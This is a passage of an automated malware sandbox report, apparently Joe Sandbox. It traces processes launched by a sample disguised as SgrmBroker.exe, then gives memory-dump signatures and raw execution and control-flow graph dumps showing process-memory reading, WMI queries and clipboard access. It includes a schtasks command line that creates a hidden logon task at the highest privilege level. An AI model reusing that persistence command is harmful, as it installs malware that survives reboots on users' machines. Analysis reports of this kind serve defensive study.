Imagebase: 0x7ff7bf9d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 12:15:52
Start date: 27/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff77c580000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 12:15:52
Start date: 27/10/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Imagebase: 0x7ff752230000
File size: 235'008 bytes
MD5 hash: 796B784E98008854C27F4B18D287BA30
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true
                                                                                      • API ID:
                                                                                      • String ID: R_^'$R_^($R_^7$R_^8
                                                                                      • API String ID: 0-2994677593
                                                                                      • Opcode ID: b05230c45a2ae80fa0c2667774379b3f138d2cbf89df5a37baeb13bda5e8e150
                                                                                      • Instruction ID: 15a5917a03a58a05b652806189428b117d0f512074d103511b922ddc48afde39
                                                                                      • Opcode Fuzzy Hash: b05230c45a2ae80fa0c2667774379b3f138d2cbf89df5a37baeb13bda5e8e150
                                                                                      • Instruction Fuzzy Hash: AD21FFE3B1A6256A92047F78F5D11E57768EFD4770B90067ED2DC4F043AE14348746D8
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000017.00000002.2570833552.00007FF684A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF684A80000, based on PE: true
                                                                                      • Associated: 00000017.00000002.2570696394.00007FF684A80000.00000002.00000001.01000000.00000008.sdmp
                                                                                      • Associated: 00000017.00000002.2572042733.00007FF684C9E000.00000002.00000001.01000000.00000008.sdmp
                                                                                      • Associated: 00000017.00000002.2572042733.00007FF68569E000.00000002.00000001.01000000.00000008.sdmp
                                                                                      • Associated: 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp
                                                                                      • Associated: 00000017.00000002.2579903036.00007FF68659D000.00000004.00000001.01000000.00000008.sdmp
                                                                                      • Associated: 00000017.00000002.2579945684.00007FF68659F000.00000002.00000001.01000000.00000008.sdmp
                                                                                      • Associated: 00000017.00000002.2579986666.00007FF6865A9000.00000002.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_23_2_7ff684a80000_SppExtComObj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: bf7013351bea8f0f683ff0573f0f6c58ebd228a8967c8e45b9ed1b21e131e287
                                                                                      • Instruction ID: 0cfa60afa2b2116c7c6d9f8a58c5a16d59437c47b56a6b858853d28c57e97a06
                                                                                      • Opcode Fuzzy Hash: bf7013351bea8f0f683ff0573f0f6c58ebd228a8967c8e45b9ed1b21e131e287
                                                                                      • Instruction Fuzzy Hash: A3115E22604F01CAEB109F20F8552A833A4FF0975CF441A35EA5D86798DF3CD5A5C340

                                                                                      Execution Graph

                                                                                      Execution Coverage:7.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:33.5%
                                                                                      Total number of Nodes:935
                                                                                      Total number of Limit Nodes:32
                                                                                      execution_graph: [raw node/edge listing of the interactive execution graph, spilled into text where the rendered graph was; each node is a function address (7ff6d9...) annotated with the Windows APIs it calls or the count of API calls in its callees, followed by "node->node" edges. Not readable as a graph in text form; see the rendered Execution Graph in the original report.]
17701->17707 17746 7ff6d9dbeda0 17701->17746 17702->17696 17703->17700 17703->17701 17704->17700 17704->17701 17705->17704 17707->17454 17709 7ff6d9db9dce 17708->17709 17712 7ff6d9db9dec 17708->17712 17710 7ff6d9db9ddd HeapFree 17709->17710 17709->17712 17710->17712 17711 7ff6d9db9e11 17711->17453 17712->17711 17713 7ff6d9db9df9 HeapFree 17712->17713 17713->17711 17718 7ff6d9de6121 17714->17718 17715 7ff6d9de6150 17715->17463 17716 7ff6d9de617c WaitOnAddress 17717 7ff6d9de619a GetLastError 17716->17717 17716->17718 17717->17718 17718->17715 17718->17716 17720 7ff6d9de5f27 17719->17720 17721 7ff6d9de5e76 17719->17721 17722 7ff6d9dba490 2 API calls 17720->17722 17723 7ff6d9dbaa70 4 API calls 17721->17723 17726 7ff6d9de5eb0 17721->17726 17724 7ff6d9de5f6a 17722->17724 17723->17726 17725 7ff6d9dba540 2 API calls 17724->17725 17727 7ff6d9de5f72 17725->17727 17726->17455 17729 7ff6d9dc9960 3 API calls 17728->17729 17730 7ff6d9de5f97 17729->17730 17730->17462 17732 7ff6d9dbf6b9 17731->17732 17734 7ff6d9de62f1 17733->17734 17735 7ff6d9de63e4 17734->17735 17736 7ff6d9de633a 17734->17736 17739 7ff6d9de6374 17734->17739 17755 7ff6d9dba490 17735->17755 17736->17739 17751 7ff6d9dbaa70 17736->17751 17739->17688 17744 7ff6d9de6472 17744->17688 17745 7ff6d9de6456 HeapAlloc 17747 7ff6d9dbedaf HeapFree 17746->17747 17748 7ff6d9dbedc2 17746->17748 17747->17748 17749 7ff6d9dbede7 17748->17749 17750 7ff6d9dbedcf HeapFree 17748->17750 17749->17707 17750->17749 17752 7ff6d9dbab28 17751->17752 17753 7ff6d9dbaa99 17751->17753 17752->17739 17753->17752 17754 7ff6d9dc9d80 4 API calls 17753->17754 17754->17752 17757 7ff6d9dba4b9 17755->17757 17756 7ff6d9dba534 17760 7ff6d9dba540 17756->17760 17757->17756 17758 7ff6d9dba522 HeapFree 17757->17758 17759 7ff6d9dba50d HeapFree 17757->17759 17758->17756 17759->17758 17761 7ff6d9dba5aa GetProcessHeap 17760->17761 17764 7ff6d9dba554 17760->17764 17761->17744 17761->17745 17762 7ff6d9dba590 HeapFree 17762->17761 17763 7ff6d9dba57e HeapFree 
17763->17762 17764->17762 17764->17763 17766 7ff6d9dc9914 17765->17766 17767 7ff6d9dc990f 17765->17767 17771 7ff6d9de5ca0 17766->17771 17767->17471 17772 7ff6d9de5cbc 17771->17772 17773 7ff6d9de5d2d 17771->17773 17772->17773 17774 7ff6d9dc993d 17772->17774 17775 7ff6d9de5d06 WaitOnAddress 17772->17775 17773->17774 17777 7ff6d9de5de8 WakeByAddressAll 17773->17777 17774->17471 17775->17772 17776 7ff6d9de5d24 GetLastError 17775->17776 17776->17772 17777->17774 17785 7ff6d9dcda50 17786 7ff6d9dcda75 17785->17786 17795 7ff6d9dcdb20 17785->17795 17787 7ff6d9dcdafc GetSystemTimes 17786->17787 17788 7ff6d9dcdac9 GetProcessTimes 17786->17788 17791 7ff6d9dcdb1b GetLastError 17787->17791 17787->17795 17788->17787 17789 7ff6d9dcdaf7 GetLastError 17788->17789 17789->17787 17790 7ff6d9dcdc84 GetProcessIoCounters 17792 7ff6d9dcde29 GetLastError 17790->17792 17793 7ff6d9dcdbd9 17790->17793 17791->17795 17792->17793 17794 7ff6d9dcdd1b OpenProcessToken 17793->17794 17796 7ff6d9dcde54 17793->17796 17798 7ff6d9dcdd42 17794->17798 17799 7ff6d9dcde4f GetLastError 17794->17799 17795->17790 17795->17793 17797 7ff6d9dcdec6 NtQueryInformationProcess 17796->17797 17815 7ff6d9dce19d 17796->17815 17801 7ff6d9dcdefd 17797->17801 17797->17815 17798->17796 17802 7ff6d9dcdd58 GetTokenInformation 17798->17802 17799->17796 17800 7ff6d9dce2b5 17803 7ff6d9dcdf0e ReadProcessMemory 17801->17803 17804 7ff6d9dce046 NtQueryInformationProcess 17801->17804 17805 7ff6d9dcdd82 GetLastError 17802->17805 17806 7ff6d9dcdda1 GetProcessHeap 17802->17806 17807 7ff6d9dcdf36 ReadProcessMemory 17803->17807 17808 7ff6d9dce198 GetLastError 17803->17808 17812 7ff6d9dce074 ReadProcessMemory 17804->17812 17804->17815 17805->17806 17809 7ff6d9dcde42 CloseHandle 17805->17809 17810 7ff6d9dcddba HeapAlloc 17806->17810 17811 7ff6d9dcde3d GetLastError 17806->17811 17807->17808 17822 7ff6d9dcdf65 17807->17822 17808->17815 17809->17796 17809->17799 17810->17809 17813 7ff6d9dcddd0 GetTokenInformation 17810->17813 17811->17809 
17812->17808 17816 7ff6d9dce0bb ReadProcessMemory 17812->17816 17818 7ff6d9dce331 GetLastError 17813->17818 17819 7ff6d9dcddf6 17813->17819 17814 7ff6d9dce24a HeapFree 17814->17800 17815->17800 17817 7ff6d9dce1ec K32GetModuleFileNameExW 17815->17817 17845 7ff6d9dce236 17815->17845 17816->17808 17836 7ff6d9dce0eb 17816->17836 17830 7ff6d9dce200 17817->17830 17821 7ff6d9dcf020 2 API calls 17818->17821 17991 7ff6d9dcf060 17819->17991 17827 7ff6d9dce33e CloseHandle 17821->17827 17823 7ff6d9dcdfc9 17822->17823 17826 7ff6d9dce4f1 17822->17826 18007 7ff6d9de7fa9 17822->18007 17831 7ff6d9dcdfdf 17823->17831 17832 7ff6d9dce3d8 17823->17832 17825 7ff6d9dce522 VirtualQueryEx 17843 7ff6d9dce655 17825->17843 17851 7ff6d9dce553 17825->17851 17826->17825 17861 7ff6d9dce6ae 17826->17861 17827->17796 17837 7ff6d9dce34f 17827->17837 17828 7ff6d9dce31e 17838 7ff6d9dceb4e VirtualQueryEx 17828->17838 17867 7ff6d9dcec19 17828->17867 17962 7ff6d9dbade0 17830->17962 17950 7ff6d9dcf390 NtQueryInformationProcess 17831->17950 17839 7ff6d9dc9960 3 API calls 17832->17839 17833 7ff6d9dce354 17848 7ff6d9dce373 HeapFree 17833->17848 17849 7ff6d9dce389 17833->17849 17834 7ff6d9dcde17 18002 7ff6d9dcf020 GetProcessHeap 17834->18002 17836->17828 17840 7ff6d9de7fa9 3 API calls 17836->17840 17858 7ff6d9dce151 17836->17858 17837->17799 17852 7ff6d9dceb73 17838->17852 17853 7ff6d9dceba6 17838->17853 17855 7ff6d9dce3f0 17839->17855 17840->17858 17844 7ff6d9dce691 17843->17844 17872 7ff6d9dce680 HeapFree 17843->17872 17844->17861 17862 7ff6d9dce69c HeapFree 17844->17862 17845->17800 17845->17814 17846 7ff6d9dcea40 17860 7ff6d9dcf160 6 API calls 17846->17860 17847 7ff6d9dce167 17857 7ff6d9dcf390 14 API calls 17847->17857 17848->17849 17864 7ff6d9dcf020 2 API calls 17849->17864 17850 7ff6d9dce9f3 17851->17850 17874 7ff6d9dc9960 3 API calls 17851->17874 17981 7ff6d9dcf160 17852->17981 17854 7ff6d9dcebf5 17853->17854 17879 7ff6d9dcebe0 HeapFree 17853->17879 17866 7ff6d9dcec05 HeapFree 17854->17866 17854->17867 
17855->17850 17868 7ff6d9dce3f9 ReadProcessMemory 17855->17868 17856 7ff6d9dcdfec 17869 7ff6d9dce4d2 17856->17869 17891 7ff6d9dce034 HeapFree 17856->17891 17873 7ff6d9dce174 17857->17873 17858->17846 17858->17847 17871 7ff6d9dcea4d 17860->17871 17861->17815 17863 7ff6d9dc9960 3 API calls 17861->17863 17862->17861 17875 7ff6d9dce76c 17863->17875 17876 7ff6d9dce3a6 17864->17876 17866->17867 17867->17850 17886 7ff6d9dc9960 3 API calls 17867->17886 17880 7ff6d9dce425 17868->17880 17881 7ff6d9dce457 GetLastError 17868->17881 17869->17826 17882 7ff6d9dce4dd HeapFree 17869->17882 17892 7ff6d9dcf260 9 API calls 17871->17892 17916 7ff6d9dcea57 17871->17916 17872->17843 17883 7ff6d9dce2ff 17873->17883 17903 7ff6d9dce273 HeapFree 17873->17903 17884 7ff6d9dce5a9 17874->17884 17875->17850 17887 7ff6d9dce775 ReadProcessMemory 17875->17887 17888 7ff6d9dcf140 CloseHandle 17876->17888 17878 7ff6d9dcec40 17910 7ff6d9dcec9d HeapFree 17878->17910 17929 7ff6d9dcecb2 17878->17929 17879->17853 17889 7ff6d9dce45c HeapFree 17880->17889 17890 7ff6d9dce42c 17880->17890 17881->17889 17882->17826 17883->17828 17894 7ff6d9dce30a HeapFree 17883->17894 17884->17850 17895 7ff6d9dce5b2 ReadProcessMemory 17884->17895 17885 7ff6d9dcde27 17885->17796 17893 7ff6d9dcee70 17886->17893 17896 7ff6d9dce885 GetLastError 17887->17896 17897 7ff6d9dce7a7 17887->17897 17888->17885 17900 7ff6d9dce489 17889->17900 18011 7ff6d9dcf260 CommandLineToArgvW 17890->18011 17891->17856 17904 7ff6d9dcea92 17892->17904 17893->17850 17905 7ff6d9dcee79 ReadProcessMemory 17893->17905 17894->17828 17901 7ff6d9dce63e GetLastError 17895->17901 17902 7ff6d9dce5db 17895->17902 17899 7ff6d9dce88a HeapFree 17896->17899 17897->17899 17921 7ff6d9dce7b2 17897->17921 17899->17815 17911 7ff6d9dce8af HeapFree 17899->17911 17900->17869 17923 7ff6d9dce4c0 HeapFree 17900->17923 17908 7ff6d9dce643 HeapFree 17901->17908 17907 7ff6d9dce5e2 17902->17907 17902->17908 17903->17873 17913 7ff6d9dcea97 HeapFree 17904->17913 17904->17916 17914 
7ff6d9dcef83 GetLastError 17905->17914 17915 7ff6d9dceead 17905->17915 17906 7ff6d9dceaeb 17906->17828 17917 7ff6d9dceaf6 HeapFree 17906->17917 17927 7ff6d9dce62d HeapFree 17907->17927 17940 7ff6d9dce90b 17907->17940 17908->17843 17910->17878 17911->17815 17912 7ff6d9dced02 17912->17867 17918 7ff6d9dceddb RtlFreeHeap 17912->17918 17913->17916 17919 7ff6d9dcef88 HeapFree 17914->17919 17915->17919 17928 7ff6d9dceebd 17915->17928 17916->17906 17920 7ff6d9dcead6 HeapFree 17916->17920 17917->17828 17918->17867 17919->17850 17924 7ff6d9dcefaf HeapFree 17919->17924 17920->17916 17922 7ff6d9dbade0 4 API calls 17921->17922 17925 7ff6d9dce7f4 17922->17925 17923->17900 17924->17850 17932 7ff6d9dce832 17925->17932 17933 7ff6d9dce8d7 17925->17933 17926 7ff6d9dce9f8 RtlFreeHeap 17926->17861 17927->17907 17930 7ff6d9dbade0 4 API calls 17928->17930 17929->17850 17929->17912 17939 7ff6d9dbade0 4 API calls 17929->17939 17947 7ff6d9d4af80 7 API calls 17929->17947 17931 7ff6d9dceef9 17930->17931 17941 7ff6d9dcef2b 17931->17941 17942 7ff6d9dcefd9 17931->17942 17935 7ff6d9dce86e 17932->17935 17936 7ff6d9dce858 HeapFree 17932->17936 17937 7ff6d9dce8e2 HeapFree 17933->17937 17938 7ff6d9dce8f4 HeapFree 17933->17938 17934 7ff6d9dce95a 17934->17926 17935->17938 17936->17935 17937->17938 17938->17815 17939->17929 17940->17850 17940->17926 17940->17934 17948 7ff6d9dbade0 4 API calls 17940->17948 17968 7ff6d9d4af80 17940->17968 17945 7ff6d9dcef55 HeapFree 17941->17945 17946 7ff6d9dcef70 17941->17946 17943 7ff6d9dcefe4 HeapFree 17942->17943 17944 7ff6d9dceff8 HeapFree 17942->17944 17943->17944 17944->17850 17945->17946 17946->17944 17947->17929 17948->17940 17951 7ff6d9dcf3c0 GetErrorInfo 17950->17951 17952 7ff6d9dcf3eb 17950->17952 17951->17952 17953 7ff6d9dc9960 3 API calls 17952->17953 17959 7ff6d9dcf495 17952->17959 17954 7ff6d9dcf42c 17953->17954 17955 7ff6d9dcf4c3 17954->17955 17956 7ff6d9dcf435 NtQueryInformationProcess 17954->17956 17957 7ff6d9dcf483 HeapFree 17956->17957 17958 
7ff6d9dcf459 17956->17958 17957->17959 17960 7ff6d9dcf260 9 API calls 17958->17960 17959->17856 17961 7ff6d9dcf46f HeapFree 17960->17961 17961->17959 17963 7ff6d9dbadf5 17962->17963 17966 7ff6d9dbae13 17962->17966 17964 7ff6d9dc9960 3 API calls 17963->17964 17963->17966 17964->17966 17965 7ff6d9dbb01b 17965->17845 17966->17965 17967 7ff6d9de6040 4 API calls 17966->17967 17967->17966 17969 7ff6d9d4af93 17968->17969 17972 7ff6d9d4b007 17968->17972 17970 7ff6d9dc9d80 4 API calls 17969->17970 17969->17972 17970->17972 17971 7ff6d9d4b233 17973 7ff6d9d4b29c HeapFree 17971->17973 17974 7ff6d9d4b00e 17971->17974 17972->17971 17972->17974 17975 7ff6d9dc9960 3 API calls 17972->17975 17976 7ff6d9d4b16e 17972->17976 17973->17971 17974->17940 17975->17976 17976->17974 18017 7ff6d9d41c90 17976->18017 17979 7ff6d9d4b1d4 17979->17974 17980 7ff6d9d4b1fb HeapFree 17979->17980 17980->17974 17982 7ff6d9dcf182 17981->17982 17983 7ff6d9dcf258 17981->17983 17982->17983 17984 7ff6d9dc9960 3 API calls 17982->17984 17985 7ff6d9dcf1b7 17984->17985 17985->17983 17986 7ff6d9dcf1c0 ReadProcessMemory 17985->17986 17987 7ff6d9dcf206 GetLastError 17986->17987 17989 7ff6d9dcf1ec 17986->17989 17990 7ff6d9dcf225 HeapFree 17987->17990 17988 7ff6d9dceb95 17988->17853 17988->17878 17989->17988 17989->17990 17990->17988 17992 7ff6d9dcde06 17991->17992 17993 7ff6d9dcf071 IsValidSid 17991->17993 17992->17833 17992->17834 17993->17992 17994 7ff6d9dcf081 GetLengthSid 17993->17994 17995 7ff6d9dcf08e 17994->17995 17996 7ff6d9dcf0d6 CopySid 17994->17996 17998 7ff6d9dc9960 3 API calls 17995->17998 17996->17992 17997 7ff6d9dcf0ea GetLastError 17996->17997 17997->17992 17999 7ff6d9dcf0a5 17998->17999 17999->17992 18000 7ff6d9dcf0ae CopySid 17999->18000 18000->17992 18001 7ff6d9dcf106 GetLastError HeapFree 18000->18001 18001->17992 18003 7ff6d9dcde1f 18002->18003 18004 7ff6d9dcf038 HeapFree 18002->18004 18005 7ff6d9dcf140 CloseHandle 18003->18005 18004->18003 18006 7ff6d9dcf14e 18005->18006 18006->17885 18008 
7ff6d9de7fbd 18007->18008 18009 7ff6d9de7fb8 18007->18009 18010 7ff6d9de5ca0 3 API calls 18008->18010 18009->17823 18010->18009 18012 7ff6d9dce443 HeapFree 18011->18012 18014 7ff6d9dcf28d 18011->18014 18012->17900 18013 7ff6d9dcf338 LocalFree 18013->18012 18014->18013 18015 7ff6d9dbade0 4 API calls 18014->18015 18016 7ff6d9d4af80 7 API calls 18014->18016 18015->18014 18016->18014 18018 7ff6d9d41d09 18017->18018 18019 7ff6d9d41caa 18017->18019 18018->17971 18018->17979 18019->18018 18020 7ff6d9d41cea HeapFree 18019->18020 18020->18018
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$Free$Heap$EnvironmentStrings$AddressCompareOrdinalSingleStringWake
                                                                                      • String ID: #$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid$.exeprogram not found$=$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$p
                                                                                      • API String ID: 2893925715-605661072
                                                                                      • Opcode ID: abf6f998de198fb72599f47d71bd1c3ed7613587fb29a02c65eb20443f034696
                                                                                      • Instruction ID: c8e60c667bddd861d5d3131a67c7187011c9c34b75b017f09c0ac15e967b68f0
                                                                                      • Opcode Fuzzy Hash: abf6f998de198fb72599f47d71bd1c3ed7613587fb29a02c65eb20443f034696
                                                                                      • Instruction Fuzzy Hash: E983A222A0CED281EA719F15E4443BEA7A1FB88B94F444237DA9D97B99DF3CD461C700
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Free$Thread$CurrentDescriptionExceptionGuaranteeHandlerProcessStackVectored
                                                                                      • String ID: $ $V1N*~GX$^F|m%dIS$arenegyl$arenegyl$main$modnarod$modnarod$setybdet$setybdet$uespemos$uespemos
                                                                                      • API String ID: 3189231204-887744486
                                                                                      • Opcode ID: d3f3f8f4880be2e2ba43278f170bae56eb76ebb1d8e88676a972b7f7af556f38
                                                                                      • Instruction ID: 5bd083b3d25b89ef67c8fab01cc6dfb88f281e3e678f14a4e7321c6348bf669a
                                                                                      • Opcode Fuzzy Hash: d3f3f8f4880be2e2ba43278f170bae56eb76ebb1d8e88676a972b7f7af556f38
                                                                                      • Instruction Fuzzy Hash: 2853B232619BD181EBA18F16E4503BE77A1FB88B80F448236DA8D87B99DF3CD525C740
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFreeHeapInformationQuery$CloseHandle
                                                                                      • String ID: $main
                                                                                      • API String ID: 1158601441-474169129
                                                                                      • Opcode ID: 44c87d6660bac3bb190a17a80cfd78c33820fffea89a8e1459b98cd017e14407
                                                                                      • Instruction ID: 7d13db92c7f39e06d97e0b1ffd0a76c33c8487489935d8e33ee93a7bba564733
                                                                                      • Opcode Fuzzy Hash: 44c87d6660bac3bb190a17a80cfd78c33820fffea89a8e1459b98cd017e14407
                                                                                      • Instruction Fuzzy Hash: 5FE28F32A09B8181EA609F11E4403BE67B0FB89BD8F544237DA9D87BA5DF3CE565C740
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ErrorLast$Information$HeapToken$MemoryQueryReadTimes$AllocCloseCountersFreeHandleOpenSystem
                                                                                      • String ID:
                                                                                      • API String ID: 3519098311-0
                                                                                      • Opcode ID: 8a7b5a9d83be089031172fb6e521d659fa4de7893426e574d961a6295065d13a
                                                                                      • Instruction ID: b4401a40a631cbe64610859eb08480027eee744d69fe8928bc7903e04843cad3
                                                                                      • Opcode Fuzzy Hash: 8a7b5a9d83be089031172fb6e521d659fa4de7893426e574d961a6295065d13a
                                                                                      • Instruction Fuzzy Hash: 31C29562A08F8686E7648F16E4443BE67A1FF89B94F444637DA8D83794DF3CE4A4C710
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Heap$String$ErrorInfo$AllocateBlanketCreateInstanceProcessProxy
                                                                                      • String ID: 0$ROOT\CIMV2$UP$WQLEmptyNullStringI1I2I4I8R4R8BoolUI1UI2UI4UI8ArrayObjectIUnknownWrapperinner$Vr$c${o
                                                                                      • API String ID: 1388123693-743638217
                                                                                      • Opcode ID: a82baf6901ad28eaa3218fa9b6457a8307f4107da804e78cb88e8bb6a9ec7d7d
                                                                                      • Instruction ID: 3d48a3638ccf8ff5514ff1ece2cd4e702e1c7faf5229db1ee1eb077aae44be96
                                                                                      • Opcode Fuzzy Hash: a82baf6901ad28eaa3218fa9b6457a8307f4107da804e78cb88e8bb6a9ec7d7d
                                                                                      • Instruction Fuzzy Hash: 94233636609BC185EA618F15E4403EEB7B4FB98B84F448226DACD83B99DF7CD564CB40
                                                                                      Control-flow Graph (legend: Executed / Not Executed)
                                                                                      control_flow_graph 2635 7ff6d9cfd2b0-7ff6d9cfd2cb 2637 7ff6d9cfd2cd-7ff6d9cfd2ed HeapFree 2635->2637 2639 7ff6d9cfd2ef-7ff6d9cfd300 HeapFree 2637->2639 2640 7ff6d9cfd306-7ff6d9cfd310 2637->2640 2639->2640 2641 7ff6d9cfd325-7ff6d9cfd32f 2640->2641 2642 7ff6d9cfd312-7ff6d9cfd315 2640->2642 2644 7ff6d9cfd344-7ff6d9cfd34e 2641->2644 2645 7ff6d9cfd331-7ff6d9cfd334 2641->2645 2642->2641 2643 7ff6d9cfd317-7ff6d9cfd31f CloseHandle 2642->2643 2643->2641 2647 7ff6d9cfd363-7ff6d9cfd36e 2644->2647 2648 7ff6d9cfd350-7ff6d9cfd353 2644->2648 2645->2644 2646 7ff6d9cfd336-7ff6d9cfd33e CloseHandle 2645->2646 2646->2644 2649 7ff6d9cfd374-7ff6d9cfd387 2647->2649 2650 7ff6d9cfd69b-7ff6d9cfd6a4 2647->2650 2648->2647 2651 7ff6d9cfd355-7ff6d9cfd35d CloseHandle 2648->2651 2652 7ff6d9cfd422-7ff6d9cfd42f 2649->2652 2653 7ff6d9cfd38d-7ff6d9cfd390 2649->2653 2654 7ff6d9cfd6bd-7ff6d9cfd75e call 7ff6d9cfd6d0 2650->2654 2655 7ff6d9cfd6a6-7ff6d9cfd6b7 HeapFree 2650->2655 2651->2647 2658 7ff6d9cfd462-7ff6d9cfd465 2652->2658 2656 7ff6d9cfd392-7ff6d9cfd39c 2653->2656 2657 7ff6d9cfd40e-7ff6d9cfd414 2653->2657 2677 7ff6d9cfd77f-7ff6d9cfd811 call 7ff6d9cf1530 GetClipboardData GlobalLock GlobalSize WideCharToMultiByte 2654->2677 2655->2654 2661 7ff6d9cfd39e-7ff6d9cfd3a2 2656->2661 2662 7ff6d9cfd3bc-7ff6d9cfd3c0 2656->2662 2663 7ff6d9cfd41a-7ff6d9cfd41d 2657->2663 2664 7ff6d9cfd666-7ff6d9cfd66d 2657->2664 2665 7ff6d9cfd490-7ff6d9cfd493 2658->2665 2666 7ff6d9cfd467-7ff6d9cfd472 2658->2666 2672 7ff6d9cfd3b0-7ff6d9cfd3ba 2661->2672 2662->2657 2674 7ff6d9cfd3c2-7ff6d9cfd3ce 2662->2674 2675 7ff6d9cfd689-7ff6d9cfd695 HeapFree 2663->2675 2673 